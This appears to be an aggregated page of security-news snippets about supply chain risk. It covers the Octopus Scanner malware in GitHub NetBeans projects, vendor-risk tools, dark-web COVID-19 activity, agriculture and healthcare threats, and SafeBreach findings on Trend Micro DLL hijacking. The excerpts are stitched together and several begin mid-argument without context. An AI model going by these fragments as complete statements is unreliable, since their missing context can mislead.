Security News

GitHub revealed on Thursday that tens of open source NetBeans projects hosted on its platform were targeted by a piece of malware as part of what appears to be a supply chain attack. GitHub learned about the malware, which has been named Octopus Scanner, on March 9 from a security researcher who noticed that several repositories hosted on GitHub had been serving malware, likely without their owners' knowledge.

This unprecedented access gives organizations the ability to see detailed views of all vendors, including profile information, the VendorBase risk assessment score, explanations on risk scores, a timeline view of relevant email communication and security activity for that vendor. "Before VendorBase, organizations lacked clear visibility of the BEC risk from their supply chains. This new capability greatly mitigates this risk and makes it much easier for organizations to directly remediate and investigate BEC attacks from compromised vendors."

Researchers have trawled the dark web to see how the underground is responding to the COVID-19 pandemic. Researchers from Trustwave have found that the underground mirrors the overground - some people seek to make money from the crisis, others ignore it, and still others offer genuine help, information and advice to forum members.

"Technology adoption has skyrocketed in virtually every segment of our agriculture sector including food production, processing, and distribution," comments Parham Eftekhari, founder and chairman of the Institute for Critical Infrastructure Technology, "And experts predict this trend to continue with robotics and self-driving freight carriers paving the way for an autonomous future. This creates significant opportunity for disruption to our supply chain and food safety concerns." He continued, "Today, we are already hearing stories of processing plants shutting down and the potential of food shortages. What if manufacturing and storage facilities of perishable food products have their cooling systems hacked during a time of a national food shortage? It would only take a handful of high-profile attacks to create panic among citizens that could lead to a rush on grocery stores and threaten an already fragile food supply."

Billions of data points are gathered throughout the UPS network every week. Find out how the information collected is revolutionizing the logistics giant.

Rather than reinventing the wheel by writing their own code to handle common tasks, they write it once as a software package and upload it to repositories. These repositories contain thousands of packages for developers to download. The upside is that it accelerates software development.

As a result, there are real consequences including loss of revenue, loss of productivity, and loss of reputation - all of which can jeopardize resiliency and are amplified given today's supply chain concerns related to COVID-19. "Organizations are starting to ask the question about what happens to them if their supply chain partners go out of business. Sadly, most companies don't have the risk visibility into their supply chains to answer that question," stated Brenda Ferraro, VP of third-party risk at Prevalent.

During 2019 a SafeBreach research team discovered major vulnerabilities in widely used security products that were written and tested by reputable cybersecurity companies. Product What can happen Underlying flaws Trend Micro Maximum Security 2019 and 2020 DLL Search-Order Hijacking Signed Execution Whitelisting Bypass Uncontrolled search path, no digital certificate validation against the binary.

Cybersecurity incidents are also a grave problem for companies across global supply chains as more enterprises adopt digitized management systems. A new report from supply chain company Resilience360 goes into detail about the cyberthreats facing supply chains in 2020 and the bevy of incidents that occurred throughout 2019.

How can the use of "Smart contracts" based on distributed ledger technology help improve the overall security picture for evolving healthcare sector supply chains? Mitch Parker, CISO of Indiana University Health, explains. "Smart contracts are pieces of executable code that can run as part of a distributed ledge technology system, and they're relevant to healthcare supply chain because a lot of the [newer] enterprise planning resource systems we're putting in actually support those as a way of doing data interchange," says Parker in an interview with Information Security Media Group.